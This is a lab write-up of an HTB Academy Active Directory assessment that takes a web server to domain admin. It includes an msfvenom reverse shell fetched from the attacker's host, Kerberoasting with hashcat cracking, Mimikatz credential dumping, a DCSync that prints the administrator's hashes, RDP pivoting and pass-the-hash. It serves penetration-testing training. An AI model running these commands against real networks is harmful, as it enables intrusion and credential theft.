HTB Acad AD Attack Module Final Assessment

Part I

Getting a shell

We are given a web server that is running aspx. It has file upload vulnerability. In the /uploads there is a web page where we can run Powershell commands.

my first goal was to get a shell on my Linux attack machine. So I used msfvenom to craft a shell and ran a simple http server:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.238 LPORT=9999 -f exe > shell.exe
python3 -m http.server 8080

On the web server fetched the shell:

Invoke-WebRequest -Uri "http://10.10.15.238:8080/shell.exe" -OutFile "C:\shell.exe"

Before we run this shell on the server we need to start a meterpreter session:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.15.238
LHOST => 10.10.15.238
msf6 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

After that we run C:\shell.exe on the server and catch the shell.

Kerberoasting SPN

Before we do anything lets run the command powershell.exe to make sure we are using Poweshell.

First we enumerate all SPNs and look for account with SPN MSSQLSvc/SQL01.inlanefreight.local:1433:

setspn.exe -Q */*

The username for this account is svc_sql

We could use the following commands to load the TGS for out target account:

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

This will load the TGS for the target in memory. Normally we do it using Mimikatz but we don't have it installed on the web server machine. So I first load it into our machine and download it in the web server:

Invoke-WebRequest -Uri "http://10.10.15.238:8080/mimikatz.exe" -OutFile "C:\mimikatz.exe"

We run mimikatz.exe and we extract the TGS from memory. We run the following two commands. One to change the output to base64 blob and one to extract:

base64 /out:true
kerberos::list /export

We copy the hash and paste it in a file lets call it sql_b64. next we turn it into .kirbi file:

cat sql_b64 | base64 -d > sql.kirbi

Then we run kirbi2jon to make it ready to crack with hashcat:

kirbi2john sql.kirbi > hash_file
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' hash_file > sql_hashcat

Finally, we crack it using hashcat:

hashcat -m 13100 sql_hashcat /usr/share/wordlists/rockyou.txt

Accessing MS01

Now that we have a valid credential for the account svc_sql and its password, we can setup a PSSession to connect to MS01.

First we create the credential:

$username = "inlanefreight\svc_sql"
$password = "lucky7"
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($username, $securePassword)

Then we run:

Enter-PSSession -ComputerName "MS01.inlanefreight.local" -Credential $cred

After that we can look at the privs:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

We can confirm that RDP port 3389 is open. To be able to access it using RDP we need the IP of MS01:

Get-NetTCPConnection | Where-Object { $_.State -eq 'Listen' }

LocalAddress                        LocalPort RemoteAddress                       RemotePort State       AppliedSetting
------------                        --------- -------------                       ---------- -----       --------------
::                                  49672     ::                                  0          Listen                    
::                                  49671     ::                                  0          Listen                    
::                                  49670     ::                                  0          Listen                    
::                                  49669     ::                                  0          Listen                    
::                                  49668     ::                                  0          Listen                    
::                                  49667     ::                                  0          Listen                    
::                                  49666     ::                                  0          Listen                    
::                                  49665     ::                                  0          Listen                    
::                                  49664     ::                                  0          Listen                    
::                                  47001     ::                                  0          Listen                    
::                                  5985      ::                                  0          Listen                    
::                                  3389      ::                                  0          Listen                    
::                                  445       ::                                  0          Listen                    
::                                  135       ::                                  0          Listen                    
0.0.0.0                             49672     0.0.0.0                             0          Listen                    
0.0.0.0                             49671     0.0.0.0                             0          Listen                    
0.0.0.0                             49670     0.0.0.0                             0          Listen                    
0.0.0.0                             49669     0.0.0.0                             0          Listen                    
0.0.0.0                             49668     0.0.0.0                             0          Listen                    
0.0.0.0                             49667     0.0.0.0                             0          Listen                    
0.0.0.0                             49666     0.0.0.0                             0          Listen                    
0.0.0.0                             49665     0.0.0.0                             0          Listen                    
0.0.0.0                             49664     0.0.0.0                             0          Listen                    
0.0.0.0                             3389      0.0.0.0                             0          Listen                    
172.16.6.50                         139       0.0.0.0                             0          Listen                    
0.0.0.0                             135       0.0.0.0                             0          Listen

ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::d144:ccca:996b:abd5%4
   IPv4 Address. . . . . . . . . . . : 172.16.6.50
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 172.16.6.1

Next, creating a portforward using meterpreter to use for RDP session to MS01 so we can RDP from our host:

portfwd add -l 7878 -p 3389 -r 172.16.6.50

xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7"

Lateral Movement

We can to get credentials for other users. Importing Mimikatz into MS01 which we have RDP access now will be useful. But MS01 cannot access our host directly so we need to use xfreerdp to mount our folder where we have mimikatz to the MS01:

xfreerdp /v:localhost:7878 /u:"inlanefreight\svc_sql" /p:"lucky7" /drive:Assess,/home/muhannad/Desktop/assess

Then we can simply copy paste mimikatz.exe file. (that we can get from github).

privilege::debug
sekurlsa::logonpasswords

This should give us the cleartext password for user tpetty. Now what can tpetty do? To enumerate further we need to transfer PowerView into the MS01 machine the same way we did mimikatz.

$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Now this user has Extended rights such as DS-Replication-Get-Changes-All which means we can do a DCSync attack.

If we run this command it will open another cmd under the context of our tpetty user:

runas /netonly /user:INLANEFREIGHT\tpetty powershell

For some reason mimikatz fails:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)

So we right click on PowerShell and select 'Run As A Different User' and put tpetty's creds as this user has the right to do DCSync:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID   : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
    ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
    ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
    lm  - 0: 757743529af55e110994f3c7e3710fc9

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : b8bcb44123b3cc3bff20c663f1e0b94d

* Primary:Kerberos-Newer-Keys *
    Default Salt : INLANEFREIGHT.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
      aes128_hmac       (4096) : 69e27df2550c5c270eca1d8ce5c46230
      des_cbc_md5       (4096) : c2d9c892f2e6f2dc
    OldCredentials
      aes256_hmac       (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
      aes128_hmac       (4096) : b93da9262f5ce0ed724ce0177366bc8a
      des_cbc_md5       (4096) : 0876d604a7087cf7
    OlderCredentials
      aes256_hmac       (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
      aes128_hmac       (4096) : e35eb565af30c8ed79df5d8875508df6
      des_cbc_md5       (4096) : 4904021983252cd5

* Primary:Kerberos *
    Default Salt : INLANEFREIGHT.LOCALAdministrator
    Credentials
      des_cbc_md5       : c2d9c892f2e6f2dc
    OldCredentials
      des_cbc_md5       : 0876d604a7087cf7

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  c05d2bd2d448c260d63c391862358e9a
    02  2ba60ae4300b00bd1a20b601f24e386a
    03  cd2b7cce6ac8a39ac0a5a048feaa059a
    04  c05d2bd2d448c260d63c391862358e9a
    05  1084cdc6cf3b03a0425a0b4b6f8df2ab
    06  4cbd7e1c07a9cd8f5d74821b8f7d73b5
    07  a60dd8c295cfea5356e2e071336e4b73
    08  9549ac69526305a3b52fc7eb81c36d5b
    09  41883c94f1394d3f6420113ee9bde48b
    10  cf77d4474145a014474eac18cb559026
    11  9549ac69526305a3b52fc7eb81c36d5b
    12  81319b4284c63dd5ecab7c53c41f2f4b
    13  f586b7f78f320c2b7f7153e3adfa3d60
    14  7ddf4411eb64636a952e01a3a6065213
    15  581bab6ff054b23e65f14adc15126f9e
    16  8638e61dd907d6ca411e1be885cf6ae2
    17  fec8a8deb4f9320986e0deaae31c7974
    18  f7dc49e2e0539d0e221b46139677c903
    19  f405be39c0733cb794a2aca4b072f2a7
    20  cf83e03b8abad7ae24a3b010cf3c7577
    21  982dab323d8efa80ad1550985eb49e71
    22  731741e7f2f621aaa2f446eb77997beb
    23  b5928a821c656d267659d5eb5e4ab02d
    24  020ab18e15e8a5fbd66748455afae6e5
    25  4ac30d853103b2f8362243b72955d89f
    26  9a0a62820b990a595affa9ac2119f299
    27  5fda8e968eabd2561522cb2c2a918f56
    28  224906fbb8c4570c87416aaee7b6419c
    29  5632d3eb6e5fc24a09f67092988a92ef

Pass-The-Hash

Finally we perform the pth attack. In the compromised machine run mimikatz in administrator mode. Then run this command with the hash:

sekurlsa::pth /user:Administrator /domain:inlanefreight.local /ntlm:27dedb1dab4d8545c6e1c66fba077da0 /run:cmd.exe

This will open a cmd with domain admin privilege. From here we can access the flag.txt in the desktop.

First we map the DC01 to our z: volume

net use Z: \\DC01\c$

type Z:\Users\Administrator\Desktop\flag.txt

PreviousPowerView Introduction NextPart II

Last updated 1 year ago

Was this helpful?